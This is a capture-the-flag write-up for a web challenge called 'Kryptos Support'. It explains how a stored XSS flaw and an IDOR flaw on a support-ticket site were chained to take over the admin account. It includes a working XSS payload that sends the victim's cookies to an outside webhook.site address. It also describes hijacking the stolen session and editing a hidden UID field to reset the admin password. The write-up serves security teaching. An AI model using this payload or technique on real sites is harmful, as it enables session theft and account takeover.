C
C
Capture The Flag
Search…
⌃K

1️⃣ Web 300: Kryptos Support

During my enumeration I got a field wherein you can submit via form, and another page which is a login portal.
I submitted a test content and got this:
The response above gave me a hint of possible XSS attack. Which leads me to get an Admin Cookies/Session. I sent a crafted xss payload using https://webhook.site.
<script>
document.write('<img src="https://webhook.site/4805b428-e4e9-4754-9ff1-74f3b03e040d?c='+document.cookie+'" />');
</script>
Now I have the session cookies.
I installed a cookie editor to use the session that came from the results of my XSS attack.
Then redirected to the admin panel. I didn't find any field or upload files, just the ticket that I submitted.
Upon checking the links, I found a change password field. I tried to change the password of the current account, that's when I noticed that the account I compromised is a moderator.
So I thought that maybe there is an Admin account for this application. Next is enabling the inspect element functions of the browser to check some hidden fields, and that where I got the UID.
I decided to edit the value to 1 and supplied my chosen password and click submit, then I received this message below
I login using admin and my chosen password and was automatically redirected to Home Page with a Flag.
Conclusion: The application is vulnerable to Persistent XSS and IDOR or known as Insecure Direct Object Reference.